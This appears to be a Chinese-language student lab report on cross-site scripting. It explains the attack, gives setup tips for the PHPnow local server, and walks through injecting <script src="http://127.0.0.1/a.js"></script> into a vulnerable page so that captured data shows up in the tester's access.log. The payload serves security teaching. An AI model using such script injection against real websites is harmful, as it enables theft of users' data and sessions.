實驗背景:
從Wikipedia搜索跨站腳本,解釋到跨區腳本(Cross-zone Scripting或者Cross Site Scripting)是指瀏覽器利用瀏覽器一些有漏洞的安全解決方案,這種攻擊使沒有權限跨站腳本在未經授權的情況下以較高的權限去執行,腳本的執行權限被客戶端(Web瀏覽器)擴大升級了。
這些XSS跨站腳本漏洞可能是:
*網頁瀏覽器設計缺陷使得在一定的條件下,一個站點完全信任另外一個高權限的站點(或者連個高低權限區域)並去執行高權限站點的腳本。
*網頁瀏覽器配置錯誤,把不安全的網站放在瀏覽器高信任列表。
*信任站點(特權區域)存在跨站腳本漏洞
一般的跨站腳本攻擊包含兩個步驟。首先是利用跨站腳本漏洞以一個特權模式去執行攻擊者構造的腳本,然後利用不安全的ActiveX控件執行惡意的行爲。通常在安靜模式讓計算機瀏覽攻擊者指定的網頁悄悄下載安裝各種惡意代碼,如間諜軟件、木馬軟件、蠕蟲等。
實驗環境:
PHO NOW環境的搭建
對於絕大多數同學來說,這個PHPNOW環境的搭建並不是一件非常困難的事情,這取決於同學們所使用的操作系統。對於WIN 8或者 WIN8.1的同學來說,這就是需要注意的一個問題。
一般來說,有這麼幾種問題:
一、 很多同學以前曾經裝過PHPNOW或者錯誤的安裝過,之後又直接刪除掉了整個文件夾。這樣會有殘留的註冊表項或者子進程一直在後臺運行,此時需要強行卸載。方法是使用PHPNOW文件夾下面的pncp.cmd,選擇33。強行終止進程並卸載,這樣就可以完整的卸載掉整個軟件,之後可以重新安裝
二、 第二種問題,就是但對於使用win8或者win8.1的同學們來說經常會遇到的問題。會出現兩條原因:一條是服務器名已經被使用,一條是需要管理員權限,在這裏我們使用如下的解決方法:
a) 一是強行卸載之後,重新啓動計算機再做嘗試
b) 二是在計算機右下角右擊->命令提示符(管理員),在打開的cmd窗口中進入到PHPNOW的文件夾目錄之下,運行setup.cmd,這個時候再根據提示進行就可以安裝完成。操作步驟和linux下類似,非常簡單,就不再贅述。
這裏要切記設置好自己的密碼,不要忘記,之後就完成了整個軟件的安裝。
參考From: http://jingyan.baidu.com/article/cb5d61050c9ce6005d2fe040.html
實驗過程:
打開瀏覽器,輸入127.0.0.1,打開
輸入127.0.0.1/a.js,出現如下界面
打開之前找到的網址
改掉後面的內容,輸入
<script src="http://127.0.0.1/a.js"></script>
可以在access.log裏面得到這樣的內容,由於網站會自行轉碼,所以無法直接閱讀,需要進一步的轉碼纔可以
<!--EndFragment-->